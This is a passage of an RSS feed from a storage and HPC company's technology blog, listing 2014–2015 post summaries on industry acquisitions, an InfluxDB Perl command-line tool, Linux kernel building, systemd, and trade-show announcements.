      <description>Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn&amp;rsquo;t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.</description>
    </item>
    
    <item>
      <title>Memory channel flash:  is it over?</title>
      <link>https://blog.scalability.org/2015/03/memory-channel-flash-is-it-over/</link>
      <pubDate>Wed, 04 Mar 2015 19:45:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/memory-channel-flash-is-it-over/</guid>
      <description>[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I&amp;rsquo;ve got no information that is not public, so I can&amp;rsquo;t disclose something I don&amp;rsquo;t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.</description>
    </item>
    
    <item>
      <title>New all-flash-array:  SanDisk&#39;s Infiniflash</title>
      <link>https://blog.scalability.org/2015/03/new-all-flash-array-sandisks-infiniflash/</link>
      <pubDate>Wed, 04 Mar 2015 18:19:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/new-all-flash-array-sandisks-infiniflash/</guid>
      <description>Interesting development from SanDisk. Not quite an M&amp;amp;A; bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the spec&amp;rsquo;s are kind of disappointing. 7GB/s maximum and 1M IOPs.</description>
    </item>
    
    <item>
      <title>M&amp;A:  HGST acquires Amplidata</title>
      <link>https://blog.scalability.org/2015/03/ma-hgst-acquires-amplidata/</link>
      <pubDate>Wed, 04 Mar 2015 17:12:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/ma-hgst-acquires-amplidata/</guid>
      <description>This is closer to home. Amplidata is an erasure coded cold storage system atop &amp;ldquo;cheap&amp;rdquo; hardware. HGST makes, of course, storage devices. This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line &amp;hellip; up to a point. The flip side to this is if you start competing with your customers.</description>
    </item>
    
    <item>
      <title>M&amp;A Avago (the LSI acquirers) just bought Emulex</title>
      <link>https://blog.scalability.org/2015/02/ma-avago-the-lsi-acquirers-just-bought-emulex/</link>
      <pubDate>Thu, 26 Feb 2015 15:27:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/ma-avago-the-lsi-acquirers-just-bought-emulex/</guid>
      <description>Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they&amp;rsquo;ve done and grabbed Emulex. Emulex has a large FC capability, but I can&amp;rsquo;t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.</description>
    </item>
    
    <item>
      <title>influxdb cli queries now with regex</title>
      <link>https://blog.scalability.org/2015/02/influxdb-cli-queries-now-with-regex/</link>
      <pubDate>Wed, 18 Feb 2015 06:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/influxdb-cli-queries-now-with-regex/</guid>
      <description>This is the way queries are supposed to work. Note the perl regex in the series name
unison&amp;gt; select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10 D[23261] Scalable::TSDB::_generate_url; dbquery = &#39;select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10&#39; D[23261] Scalable::TSDB::_generate_url; query = &#39;p=XXXXXXXX&amp;amp;u;=scalable&amp;amp;chunked;=1&amp;amp;time;_precision=s&amp;amp;q;=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010&#39; D[23261] Scalable::TSDB::_generate_url; url = &#39;http://localhost:8086/db/unison/series?p=XXXXXXX&amp;amp;u;=scalable&amp;amp;chunked;=1&amp;amp;time;_precision=s&amp;amp;q;=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010&#39; D[23261] Scalable::TSDB::_send_chunked_get_query -&amp;gt; reading 0.009837s D[23261] Scalable::TSDB::_send_chunked_get_query -&amp;gt; bytes_received = 530B D[23261] Scalable::TSDB::_send_chunked_get_query return code = 200 D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.nettotals.kbin] D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.</description>
    </item>
    
    <item>
      <title>InfluxDB cli ready for people to play with</title>
      <link>https://blog.scalability.org/2015/02/influxdb-cli-ready-for-people-to-play-with/</link>
      <pubDate>Wed, 18 Feb 2015 02:22:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/influxdb-cli-ready-for-people-to-play-with/</guid>
      <description>The code is on github. Installation should be simple sudo make INSTALLPATH=/path/where/you/want/it It will install any needed Perl modules for you. I&amp;rsquo;ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.</description>
    </item>
    
    <item>
      <title>So I finally figured it out</title>
      <link>https://blog.scalability.org/2015/02/so-i-finally-figured-it-out/</link>
      <pubDate>Sat, 14 Feb 2015 19:32:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/so-i-finally-figured-it-out/</guid>
      <description></description>
    </item>
    
    <item>
      <title>love/hate relationship with new hardware</title>
      <link>https://blog.scalability.org/2015/02/lovehate-relationship-with-new-hardware/</link>
      <pubDate>Sat, 14 Feb 2015 04:21:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/lovehate-relationship-with-new-hardware/</guid>
      <description>One of the dangers of dealing with newer hardware is often that, it doesn&amp;rsquo;t work so well. Or the drivers get hosed in mysterious ways. We&amp;rsquo;ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer design cards. Younger silicon, younger design. Newer kernel module. I can&amp;rsquo;t say I am enjoying this experience thus far.</description>
    </item>
    
    <item>
      <title>Real measurement is hard</title>
      <link>https://blog.scalability.org/2015/02/real-measurement-is-hard/</link>
      <pubDate>Mon, 09 Feb 2015 01:52:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/real-measurement-is-hard/</guid>
      <description>I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I&amp;rsquo;ve done some work in it, but Perl has been my go-to language.</description>
    </item>
    
    <item>
      <title>When the revolution hits in force ...</title>
      <link>https://blog.scalability.org/2015/02/when-the-revolution-hits-in-force/</link>
      <pubDate>Fri, 06 Feb 2015 15:35:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/when-the-revolution-hits-in-force/</guid>
      <description>Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children&amp;rsquo;s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.</description>
    </item>
    
    <item>
      <title>A wake up call about language choices for certain use cases</title>
      <link>https://blog.scalability.org/2015/02/a-wake-up-call-about-language-choices-for-certain-use-cases/</link>
      <pubDate>Thu, 05 Feb 2015 03:20:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/a-wake-up-call-about-language-choices-for-certain-use-cases/</guid>
      <description></description>
    </item>
    
    <item>
      <title>M&amp;A in our space</title>
      <link>https://blog.scalability.org/2015/02/ma-in-our-space/</link>
      <pubDate>Tue, 03 Feb 2015 03:00:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/ma-in-our-space/</guid>
      <description>The day job&amp;rsquo;s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.</description>
    </item>
    
    <item>
      <title>Hype at the speed of hype, or big data marketing and media</title>
      <link>https://blog.scalability.org/2015/02/hype-at-the-speed-of-hype-or-big-data-marketing-and-media/</link>
      <pubDate>Sun, 01 Feb 2015 15:32:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/hype-at-the-speed-of-hype-or-big-data-marketing-and-media/</guid>
      <description>There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one &amp;hellip; and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I&amp;rsquo;ve seen this, many times over my career.</description>
    </item>
    
    <item>
      <title>Shakes head, chuckles ... yeah, we couldn&#39;t see that one coming ...</title>
      <link>https://blog.scalability.org/2015/01/shakes-head-chuckles-yeah-we-couldnt-see-that-one-coming/</link>
      <pubDate>Tue, 27 Jan 2015 18:54:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/shakes-head-chuckles-yeah-we-couldnt-see-that-one-coming/</guid>
      <description>Just to get this out of the way, apart from this ideologically and politically charged debasement of real science, I am and remain firmly a &amp;ldquo;believer&amp;rdquo;* that the earths climate has changed, has been changing, will change, and continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store state of a system.</description>
    </item>
    
    <item>
      <title>Why doesn&#39;t linkedin make removing a contact easy?</title>
      <link>https://blog.scalability.org/2015/01/why-doesnt-linkedin-make-removing-a-contact-easy/</link>
      <pubDate>Tue, 27 Jan 2015 16:11:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/why-doesnt-linkedin-make-removing-a-contact-easy/</guid>
      <description>I don&amp;rsquo;t get this. Yeah, sure, your contacts are curated, and I don&amp;rsquo;t accept everyone. I need to see some aspect of a connection and be pretty sure they wont spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible on the phone apps?</description>
    </item>
    
    <item>
      <title>Where have you been all my life FFI::Platypus?</title>
      <link>https://blog.scalability.org/2015/01/where-have-you-been-all-my-life-ffiplatypus/</link>
      <pubDate>Tue, 27 Jan 2015 03:38:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/where-have-you-been-all-my-life-ffiplatypus/</guid>
      <description>Oh my &amp;hellip; this is goodness I&amp;rsquo;ve been missing badly in Perl. Just learned about it this morning. Short version. You want to mix programming languages for implementation of some project. One language makes development of some subset of functions very easy, while another language handles another part very well. You need some sort of layer to handle this usually, or a way to sanely map. FFI is the concept behind this &amp;hellip; and while there is no mention of CORBA or XDR/RPC type things, this is the logical follow-on to these (in their time) ground breaking technologies.</description>
    </item>
    
    <item>
      <title>[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)</title>
      <link>https://blog.scalability.org/2015/01/ibm-layoffs-to-hit-25-or-so-of-the-company/</link>
      <pubDate>Mon, 26 Jan 2015 00:14:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/ibm-layoffs-to-hit-25-or-so-of-the-company/</guid>
      <description>[Update] As I had wondered, and other suggested to me, this number (25%) was likely a click bait fabrication. Forbes and others also &amp;ldquo;fell for it.&amp;rdquo; I&amp;rsquo;ll admit I did as well. It was too large to ignore, but it also didn&amp;rsquo;t make sense. Close down mainframe and storage? Seriously? Lets call this what it is, an internet rumor that was busted. Paraphrasing Mark Twain &amp;ldquo;An internet rumor can travel around the world while the truth is still putting on its shoes&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Finally, a desktop Linux that just works</title>
      <link>https://blog.scalability.org/2015/01/finally-a-desktop-linux-that-just-works/</link>
      <pubDate>Thu, 22 Jan 2015 01:48:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/finally-a-desktop-linux-that-just-works/</guid>
      <description>I&amp;rsquo;ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I&amp;rsquo;ve had laptops with Windows flavors (95, XP, 2000, 7), a MacOSX desktop. Before that, my first laptop I had bought (while working on my thesis) was a triple boot job, with DOS, Windows 9x, and OS2. I used the latter for when I was traveling and needed to write; the thesis was written in LaTeX and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.</description>
    </item>
    
    <item>
      <title>stateless booting</title>
      <link>https://blog.scalability.org/2015/01/stateless-booting/</link>
      <pubDate>Sat, 17 Jan 2015 06:37:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/stateless-booting/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Coraid may be going down</title>
      <link>https://blog.scalability.org/2015/01/coraid-may-be-going-down/</link>
      <pubDate>Fri, 16 Jan 2015 07:26:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/coraid-may-be-going-down/</guid>
      <description>According to The Register. No real differentiation (AoE isn&amp;rsquo;t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn&amp;rsquo;t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren&amp;rsquo;t sure if we could build a better box.</description>
    </item>
    
    <item>
      <title>Anatomy of a #fail ... the internet of broken software stacks</title>
      <link>https://blog.scalability.org/2015/01/anatomy-of-a-fail-the-internet-of-broken-software-stacks/</link>
      <pubDate>Fri, 16 Jan 2015 03:59:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/anatomy-of-a-fail-the-internet-of-broken-software-stacks/</guid>
      <description>So I&amp;rsquo;ve been trying to diagnose a problem with my Android devices running out their batteries very quickly. And at the same time, I&amp;rsquo;ve been trying to understand why my address bar on Thunderbird has taken a very long time to respond. I had made a connection earlier today when I had noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn&amp;rsquo;t quite understand it.</description>
    </item>
    
    <item>
      <title>Drivers developed largely out of kernel, and infrequently synced</title>
      <link>https://blog.scalability.org/2015/01/drivers-developed-largely-out-of-kernel-and-infrequently-synced/</link>
      <pubDate>Thu, 15 Jan 2015 19:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/drivers-developed-largely-out-of-kernel-and-infrequently-synced/</guid>
      <description>One of the other aspects of what we&amp;rsquo;ve been doing has been forward porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to correct interface changes. I&amp;rsquo;ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently. Sometimes once every few years are they synced. Which leads to distro kernels having often terribly broken device support. And often very unstable device support.</description>
    </item>
    
    <item>
      <title>Parallel building debian kernels ... and why its not working ... and how to make it work</title>
      <link>https://blog.scalability.org/2015/01/parallel-building-debian-kernels-and-why-its-not-working-and-how-to-make-it-work/</link>
      <pubDate>Thu, 15 Jan 2015 17:02:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/parallel-building-debian-kernels-and-why-its-not-working-and-how-to-make-it-work/</guid>
      <description>So we build our own kernels. No great surprise, as we put our own patches in, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works, quite well. Same source, same patches, same make file driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But &amp;hellip; but &amp;hellip; parallel builds (e.g. leveraging more than 1 CPU) work only for the RPM builds.</description>
    </item>
    
    <item>
      <title>Amusing #fail</title>
      <link>https://blog.scalability.org/2015/01/amusing-fail/</link>
      <pubDate>Wed, 14 Jan 2015 16:55:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/amusing-fail/</guid>
      <description>I use Mozilla&amp;rsquo;s thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple&amp;rsquo;s mail client is a bad joke and only runs on apple devices (go figure). Linux&amp;rsquo;s many offerings are open source, portable, and most don&amp;rsquo;t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to OutLook anyway (used it once, 15 years ago or so &amp;hellip; never again).</description>
    </item>
    
    <item>
      <title>The Interview (no, not that one!)</title>
      <link>https://blog.scalability.org/2015/01/the-interview-no-not-that-one/</link>
      <pubDate>Wed, 07 Jan 2015 20:58:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/the-interview-no-not-that-one/</guid>
      <description>Rich at InsideHPC.com (you do read it daily, don&amp;rsquo;t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good &amp;hellip; More soon &amp;hellip; And no, we aren&amp;rsquo;t going to hack anyone</description>
    </item>
    
    <item>
      <title>Micro, Meso, and Macro shifts</title>
      <link>https://blog.scalability.org/2015/01/micro-meso-and-macro-shifts/</link>
      <pubDate>Fri, 02 Jan 2015 23:52:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/micro-meso-and-macro-shifts/</guid>
      <description>The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in market. We&amp;rsquo;ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.</description>
    </item>
    
    <item>
      <title>Friday morning/afternoon code optimization fun</title>
      <link>https://blog.scalability.org/2014/12/friday-morningafternoon-code-optimization-fun/</link>
      <pubDate>Fri, 12 Dec 2014 19:17:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/friday-morningafternoon-code-optimization-fun/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Inventory reduction @scalableinfo</title>
      <link>https://blog.scalability.org/2014/12/inventory-reduction-scalableinfo/</link>
      <pubDate>Wed, 10 Dec 2014 18:47:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/inventory-reduction-scalableinfo/</guid>
      <description>Its that time of year, when the inventory fairies come out and begin their counting. Math isn&amp;rsquo;t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty  As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).</description>
    </item>
    
    <item>
      <title>The #PortablePetaByte : Coming to a data center near you!</title>
      <link>https://blog.scalability.org/2014/12/the-portablepetabyte-coming-to-a-data-center-near-you/</link>
      <pubDate>Fri, 05 Dec 2014 21:30:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/the-portablepetabyte-coming-to-a-data-center-near-you/</guid>
      <description>As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!</description>
    </item>
    
    <item>
      <title>Three years</title>
      <link>https://blog.scalability.org/2014/11/three-years/</link>
      <pubDate>Sun, 30 Nov 2014 14:35:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/three-years/</guid>
      <description>Its been 3 years to the day since I wrote this. As we&amp;rsquo;ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. Its an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways &amp;hellip; I no longer take some things for granted. I try to spend more time with the family, do more things with them.</description>
    </item>
    
    <item>
      <title>Systemd, and the future of Linux init processing</title>
      <link>https://blog.scalability.org/2014/11/systemd-and-the-future-of-linux-init-processing/</link>
      <pubDate>Sat, 29 Nov 2014 18:28:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/systemd-and-the-future-of-linux-init-processing/</guid>
      <description>An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don&amp;rsquo;t know what this is, think of it this way.</description>
    </item>
    
    <item>
      <title>Brings a smile to my face</title>
      <link>https://blog.scalability.org/2014/11/brings-a-smile-to-my-face/</link>
      <pubDate>Fri, 28 Nov 2014 05:58:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/brings-a-smile-to-my-face/</guid>
      <description>My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. &amp;ldquo;Its code combat Dad.&amp;rdquo; she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.</description>
    </item>
    
    <item>
      <title>Learning to respect my gut feelings again</title>
      <link>https://blog.scalability.org/2014/11/learning-to-respect-my-gut-feelings-again/</link>
      <pubDate>Sun, 23 Nov 2014 17:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/learning-to-respect-my-gut-feelings-again/</guid>
      <description>A &amp;ldquo;gut feeling&amp;rdquo; is, at a deep level, a fundamental sense of something that you can&amp;rsquo;t necessarily ascribe metrics to, you can&amp;rsquo;t quantify exactly. Its not always right. Its a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with &amp;ldquo;facts&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...</title>
      <link>https://blog.scalability.org/2014/11/sc14-day-2-lucerahq-tops-scalableinfo-hardware-with-scalable-info-hardware/</link>
      <pubDate>Wed, 19 Nov 2014 16:57:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-day-2-lucerahq-tops-scalableinfo-hardware-with-scalable-info-hardware/</guid>
      <description>Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I&amp;rsquo;ll check to be sure, but I believe we are now the hardware side of most of the published records.</description>
    </item>
    
    <item>
      <title>Starting to come around to the idea that swap in any form, is evil</title>
      <link>https://blog.scalability.org/2014/11/starting-to-come-around-to-the-idea-that-swap-in-any-form-is-evil/</link>
      <pubDate>Sun, 16 Nov 2014 17:37:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/starting-to-come-around-to-the-idea-that-swap-in-any-form-is-evil/</guid>
      <description>Here&amp;rsquo;s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
 swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well &amp;hellip; Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.</description>
    </item>
    
    <item>
      <title>#sc14 T-minus 2 days and counting  #HPCmatters</title>
      <link>https://blog.scalability.org/2014/11/sc14-t-minus-2-days-and-counting-hpcmatters/</link>
      <pubDate>Sun, 16 Nov 2014 17:12:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-t-minus-2-days-and-counting-hpcmatters/</guid>
      <description>On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We&amp;rsquo;ll have a demo visualfx reel from a customer whom uses Scalable Informatics JackRabbit, DeltaV (and as the result of an upgrade yesterday), Unison. Looking forward to getting everything going, and it will be good to see everyone at the show!</description>
    </item>
    
    <item>
      <title>Gui updates ... oh my ...</title>
      <link>https://blog.scalability.org/2014/11/gui-updates-oh-my/</link>
      <pubDate>Thu, 13 Nov 2014 16:58:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/gui-updates-oh-my/</guid>
      <description></description>
    </item>
    
    <item>
      <title>30TB flash disk, Parallel File System, massive network connectivity</title>
      <link>https://blog.scalability.org/2014/11/30tb-flash-disk-parallel-file-system-massive-network-connectivity/</link>
      <pubDate>Thu, 13 Nov 2014 00:42:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/30tb-flash-disk-parallel-file-system-massive-network-connectivity/</guid>
      <description>This will be fun to watch run &amp;hellip;
Scalable Informatics FastPath Unison for the win!</description>
    </item>
    
    <item>
      <title>SC14 T minus 6 and counting</title>
      <link>https://blog.scalability.org/2014/11/sc14-t-minus-6-and-counting/</link>
      <pubDate>Wed, 12 Nov 2014 23:55:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-t-minus-6-and-counting/</guid>
      <description>Scalable&amp;rsquo;s booth is #3053. We&amp;rsquo;ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!</description>
    </item>
    
    <item>
      <title>Mixing programming languages for fun and profit</title>
      <link>https://blog.scalability.org/2014/11/mixing-programming-languages-for-fun-and-profit/</link>
      <pubDate>Wed, 12 Nov 2014 21:55:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/mixing-programming-languages-for-fun-and-profit/</guid>
      <description>I&amp;rsquo;ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I&amp;rsquo;ve been looking for some simple drawing libraries in javascript to make this higher level, so I don&amp;rsquo;t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly &amp;hellip; as javascript doesn&amp;rsquo;t quite have all the constructs one might expect from a modern language.</description>
    </item>
    
    <item>
      <title>turnkey, low cost and high density 1PB usable at 20&#43; GB/s sustained</title>
      <link>https://blog.scalability.org/2014/10/turnkey-low-cost-and-high-density-1pb-usable-at-20-gbs-sustained/</link>
      <pubDate>Wed, 29 Oct 2014 18:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/turnkey-low-cost-and-high-density-1pb-usable-at-20-gbs-sustained/</guid>
      <description>Fully turnkey, we&amp;rsquo;d ship a rack with everything pre-installed/configured. Some de-palletizing required, but its plug and play (power, disks) after that. More details, and a sign up to get a formal quote here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to BeeGFS native client.</description>
    </item>
    
    <item>
      <title>Velocity matters</title>
      <link>https://blog.scalability.org/2014/10/velocity-matters/</link>
      <pubDate>Sun, 19 Oct 2014 16:36:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/velocity-matters/</guid>
      <description>For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years.</description>
    </item>
    
    <item>
      <title>And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module</title>
      <link>https://blog.scalability.org/2014/10/and-the-0-8-3-influxdb-no-longer-works-with-the-influxdb-perl-module/</link>
      <pubDate>Thu, 16 Oct 2014 02:30:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/and-the-0-8-3-influxdb-no-longer-works-with-the-influxdb-perl-module/</guid>
      <description>I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and &amp;hellip; and &amp;hellip; Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.</description>
    </item>
    
    <item>
      <title>A good read on a bootstrapped company</title>
      <link>https://blog.scalability.org/2014/10/a-good-read-on-a-bootstrapped-company/</link>
      <pubDate>Wed, 15 Oct 2014 16:06:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/a-good-read-on-a-bootstrapped-company/</guid>
      <description>Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
 If you don&amp;rsquo;t start with building a real company, you won&amp;rsquo;t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if its someone elses ass, and money for that matter.</description>
    </item>
    
    <item>
      <title>There are times</title>
      <link>https://blog.scalability.org/2014/10/there-are-times/</link>
      <pubDate>Thu, 09 Oct 2014 03:27:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/there-are-times/</guid>
      <description>&amp;hellip; when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why did they do this to themselves? Today was like this. We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, its a metaphor. Today was a day of Pyrrhic victories.</description>
    </item>
    
    <item>
      <title>massive unapologetic firepower part 2 ... the dashboard ...</title>
      <link>https://blog.scalability.org/2014/10/massive-unapologetic-firepower-part-2-the-dashboard/</link>
      <pubDate>Tue, 07 Oct 2014 18:10:55 +0000</pubDate>
      
